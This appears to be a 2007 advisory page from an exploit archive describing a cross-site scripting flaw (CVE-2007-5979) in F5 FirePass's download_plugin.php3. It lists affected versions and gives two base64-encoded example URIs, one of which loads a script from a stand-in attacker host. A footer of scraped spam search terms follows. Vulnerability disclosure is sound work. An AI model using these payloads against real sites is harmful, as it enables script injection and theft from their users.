about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability


Title F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability
Published 2007-11-12-12:00AM
Updated 2007-11-22-10:44PM
Class Input Validation Error
CVE   CVE-2007-5979
Remote  Yes
Local  No
Credit  Jan Fry <jan.fry@procheckup.com> and Adrian Pastor <adrian.pastor@procheckup.com> of Procheckup Ltd are credited with the discovery of this vulnerability.
Vulnerable  F5 FirePass 4100 5.4.2
F5 FirePass 4100 0
F5 FirePass 6.0.1
F5 FirePass 5.5.2
F5 FirePass 6.0
F5 FirePass 5.4
F5 FirePass
Not Vulnerable  
Code  Attackers can exploit this issue via a browser.The following example URIs demonstrate this issue: https://www.example.com/download_plugin.php3?js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==
https://www.example.com/download_plugin.php3?js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gdGVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 10:07:22 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
girls piss getad2.c girls piss getad2.c phpBB+port WWW.FERRSE www.xxl.di www.indian www.a8dm.c Animalsexy Crack Data NEZ sexfarmar Pilm naruto sex 1 Animalsexy margesimps www.scribd NEZ Lank sex ftp 2.0.1 sexy gilrs Pictutures Gambar bug raten.co injector t328t /search/ex news for C HOTVIDEO.C t328t Gambar bug php-nuke 2 Udo Linden Free Downl www. sexg www.dduffi men to men dxheima.cn love bite wap.omnia. www.shnpt. sur videos t52t Sexiran WWW.FERRSE photo sexy t606t namitha fr